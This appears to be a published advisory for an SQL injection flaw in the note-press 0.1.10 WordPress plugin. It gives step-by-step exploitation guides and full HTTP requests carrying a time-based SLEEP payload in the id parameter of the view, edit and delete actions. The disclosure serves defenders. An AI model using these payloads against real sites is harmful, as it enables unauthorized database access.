(1/3) note-press 0.1.10 WordPress plugin SQL injection
Vulnerability Metadata
| Key | Value |
|---|---|
| Date of Disclosure | May 09 2022 |
| Affected Software | note-press |
| Affected Software Type | WordPress plugin |
| Version | 0.1.10 |
| Weakness | SQL Injection |
| CWE ID | CWE-89 |
| CVE ID | CVE-2022-1688 |
| CVSS 3.x Base Score | 2.7 |
| CVSS 2.0 Base Score | 4.0 |
| Reporter | Daniel Krohmer, Shi Chen |
| Reporter Contact | daniel.krohmer@iese.fraunhofer.de |
| Link to Affected Software | https://wordpress.org/plugins/note-press |
| Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-1688 |
Vulnerability Description
The id query parameter in note-press 0.1.10 is vulnerable to SQL injection in three different code sections. An authenticated attacker may abuse the view, edit and delete functionality of the plugin to craft a malicious GET request.
Exploitation Guide
Exploit 1: view
Login as admin user. This attack requires at least admin privileges.
Go to Note Press.
Choose an arbitrary Title and click on Add Note.
Click on View.
Clicking the previous button triggers the vulnerable request. id is the vulnerable query parameter.
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of id at line 1129 in ./admin/Note_Press-admin-menu.php. The final database query is called at line 494 of the same file.
Exploit 2: edit
Login as admin user. This attack requires at least admin privileges.
Go to Note Press.
Choose an arbitrary Title and click on Add Note.
Click on Edit.
Clicking the previous button triggers the vulnerable request. id is the vulnerable query parameter.
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of id at line 1133 in ./admin/Note_Press-admin-menu.php. The final database query is called at line 574 of the same file.
Exploit 3: delete
Login as admin user. This attack requires at least admin privileges.
Go to Note Press.
Choose an arbitrary Title and click on Add Note.
Click on Edit.
Clicking the previous button triggers the vulnerable request. id is the vulnerable query parameter.
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of id at line 1156 in ./admin/Note_Press-admin-menu.php. The final database query is called at line 1051 of the same file.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work. The SQL injection can be triggered by sending the requests below.
Exploit 1: view
GET /wp-admin/admin.php?page=Note_Press-Main-Menu&action=view&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=Note_Press-Main-Menu
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651827877%7C93i22K3S8WqFD892zcV4jyN07JMamrPDIjvembDZTX4%7C2a5effdfc3e78d8a37a923c62d7ea8428e3e7719c7384c3d20df1c959601647f; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651827877%7C93i22K3S8WqFD892zcV4jyN07JMamrPDIjvembDZTX4%7C0577482154b4bf69dbd69b8d96d68dc227bfb657948ce4ffc3ee461d8928b62b; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651655077;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Exploit 2: edit
GET /wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=Note_Press-Main-Menu
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651827877%7C93i22K3S8WqFD892zcV4jyN07JMamrPDIjvembDZTX4%7C2a5effdfc3e78d8a37a923c62d7ea8428e3e7719c7384c3d20df1c959601647f; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651827877%7C93i22K3S8WqFD892zcV4jyN07JMamrPDIjvembDZTX4%7C0577482154b4bf69dbd69b8d96d68dc227bfb657948ce4ffc3ee461d8928b62b; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651655077;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Exploit 3: delete
GET /wp-admin/admin.php?page=Note_Press-Main-Menu&action=delete&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651827877%7C93i22K3S8WqFD892zcV4jyN07JMamrPDIjvembDZTX4%7C2a5effdfc3e78d8a37a923c62d7ea8428e3e7719c7384c3d20df1c959601647f; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651827877%7C93i22K3S8WqFD892zcV4jyN07JMamrPDIjvembDZTX4%7C0577482154b4bf69dbd69b8d96d68dc227bfb657948ce4ffc3ee461d8928b62b; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651655077;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1